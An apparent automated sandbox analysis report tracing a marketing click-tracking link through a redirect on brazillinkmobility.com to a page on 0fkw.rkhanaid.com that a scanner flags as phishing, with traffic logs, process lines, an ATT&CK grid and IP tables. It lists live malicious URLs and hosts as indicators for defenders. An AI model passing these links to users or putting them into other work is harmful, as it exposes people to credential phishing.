Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cgii/index.html HTTP/1.1Host: brazillinkmobility.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: brazillinkmobility.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://brazillinkmobility.com/cgii/index.htmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: clickme.thryv.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: brazillinkmobility.com
Source: global trafficDNS traffic detected: DNS query: 0fkw.rkhanaid.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: blogger.googleusercontent.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 16:55:49 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 29 Sep 2022 21:55:17 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Keep-Alive: timeout=5, max=75Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 2.20.204.113:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.20.204.113:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: classification engineClassification label: mal48.win@18/16@16/11
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1964,i,15332587490438412603,18326055542032576859,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clickme.thryv.com/ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWXASxbd-2BZeaoWZvCDaIudlukgt9S3uZsKQeBP86XSjGCyt8CMjRvxL6j1Dyr0eym46qao7knFO6iIo9LZAeoxbyu5E6pzhyc9-2F2VP-2BlZM3Ea-2B-2FiBNpyPNxcoMEQ2om5Ig-2F7RZ8WTAt-2F5MxtsslPlJve5tzpsISP74pi-2B8USUpl-2BAaEmzHGUoeKWRMyxJH35FiSw-3D-3D"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1964,i,15332587490438412603,18326055542032576859,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://clickme.thryv.com/ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWXASxbd-2BZeaoWZvCDaIudlukgt9S3uZsKQeBP86XSjGCyt8CMjRvxL6j1Dyr0eym46qao7knFO6iIo9LZAeoxbyu5E6pzhyc9-2F2VP-2BlZM3Ea-2B-2FiBNpyPNxcoMEQ2om5Ig-2F7RZ8WTAt-2F5MxtsslPlJve5tzpsISP74pi-2B8USUpl-2BAaEmzHGUoeKWRMyxJH35FiSw-3D-3D0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://0fkw.rkhanaid.com/AKlVEiS64UXEo05M_nfcas4zNiMt/100%Avira URL Cloudphishing
http://brazillinkmobility.com/favicon.ico0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
brazillinkmobility.com
192.185.214.89
truefalse
    unknown
    code.jquery.com
    151.101.2.137
    truefalse
      high
      0fkw.rkhanaid.com
      104.21.55.245
      truefalse
        unknown
        d1rsqi0l6b7evg.cloudfront.net
        3.160.188.112
        truefalse
          unknown
          www.google.com
          172.217.21.36
          truefalse
            high
            googlehosted.l.googleusercontent.com
            142.250.181.65
            truefalse
              high
              clickme.thryv.com
              unknown
              unknownfalse
                high
                blogger.googleusercontent.com
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.pngfalse
                    high
                    http://brazillinkmobility.com/favicon.icofalse
                    • Avira URL Cloud: safe
                    unknown
                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                      high
                      https://clickme.thryv.com/ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWXASxbd-2BZeaoWZvCDaIudlukgt9S3uZsKQeBP86XSjGCyt8CMjRvxL6j1Dyr0eym46qao7knFO6iIo9LZAeoxbyu5E6pzhyc9-2F2VP-2BlZM3Ea-2B-2FiBNpyPNxcoMEQ2om5Ig-2F7RZ8WTAt-2F5MxtsslPlJve5tzpsISP74pi-2B8USUpl-2BAaEmzHGUoeKWRMyxJH35FiSw-3D-3Dfalse
                        unknown
                        http://brazillinkmobility.com/cgii/index.htmlfalse
                          unknown
                          https://0fkw.rkhanaid.com/AKlVEiS64UXEo05M_nfcas4zNiMt/false
                          • Avira URL Cloud: phishing
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          104.21.55.245
                          0fkw.rkhanaid.comUnited States
                          13335CLOUDFLARENETUSfalse
                          151.101.2.137
                          code.jquery.comUnited States
                          54113FASTLYUSfalse
                          239.255.255.250
                          unknownReserved
                          unknownunknownfalse
                          192.185.214.89
                          brazillinkmobility.comUnited States
                          46606UNIFIEDLAYER-AS-1USfalse
                          3.160.188.112
                          d1rsqi0l6b7evg.cloudfront.netUnited States
                          16509AMAZON-02USfalse
                          151.101.66.137
                          unknownUnited States
                          54113FASTLYUSfalse
                          172.217.21.36
                          www.google.comUnited States
                          15169GOOGLEUSfalse
                          142.250.181.65
                          googlehosted.l.googleusercontent.comUnited States
                          15169GOOGLEUSfalse
                          IP
                          192.168.2.17
                          192.168.2.4
                          192.168.2.5
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1562548
                          Start date and time:2024-11-25 17:54:34 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 3s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:browseurl.jbs
                          Sample URL:https://clickme.thryv.com/ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWXASxbd-2BZeaoWZvCDaIudlukgt9S3uZsKQeBP86XSjGCyt8CMjRvxL6j1Dyr0eym46qao7knFO6iIo9LZAeoxbyu5E6pzhyc9-2F2VP-2BlZM3Ea-2B-2FiBNpyPNxcoMEQ2om5Ig-2F7RZ8WTAt-2F5MxtsslPlJve5tzpsISP74pi-2B8USUpl-2BAaEmzHGUoeKWRMyxJH35FiSw-3D-3D
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal48.win@18/16@16/11
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
